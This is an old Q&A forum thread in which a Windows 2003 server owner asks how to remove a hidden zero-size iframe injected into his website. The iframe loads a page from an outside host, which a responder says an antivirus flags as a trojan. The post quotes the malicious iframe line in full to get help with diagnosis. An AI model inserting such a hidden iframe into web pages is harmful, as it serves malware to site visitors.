[Last Call] Learn about multicloud storage options and how to improve your company's cloud strategy. Register Now

x
?
Solved

Virus on windows 2003 server: Iframe in top of website

Posted on 2006-10-29
3
Medium Priority
?
214 Views
Last Modified: 2013-12-04
Hello,

I got a virus on my Windows 2003 Server.
On one of our major websites this line of code is placed in the top of the page:

<iframe src="http://ricewine.be/hhbb.htm" width="0" height="0" frameborder="0"></iframe>

If I open the webpage and look in the asp-file on the server, the  "iframe"-code is not there!

Anyone who know what this is? How to remove it, and why I got it?
Yes, all my software is legal, no software cracks on the server ;)

Please give me some tips to remove the virus!!!!
0
Comment
Question by:webressurs
3 Comments
 
LVL 34

Expert Comment

by:Dave_Dietz
ID: 17830566
Are you hosting this on your server or is it at a hosting facility?

Do you have any ISAPI filters or wildcard application mappings configured?

Dave Dietz
0
 
LVL 1

Author Comment

by:webressurs
ID: 17832144
Yes, this is my own windows 2003 webserver.
I dont really know wht ISAPI or wildcard application are, so I guess I dont use it :)
Mabye a virus have installed something like this...? I dont unerstand how this Iframe can appear in the website header, and how to remove it...?
0
 
LVL 6

Accepted Solution

by:
Mnf earned 1500 total points
ID: 17836206
i followed the link you specify and a Trojan with " VBS.Psyme.cf" was catched by kaspersky antivirus
look at this article to know more detailed about it and how it works.
http://www.f-secure.com/v-descs/fagot.shtml

i think any kind of antivirus program is good to identify this virus

0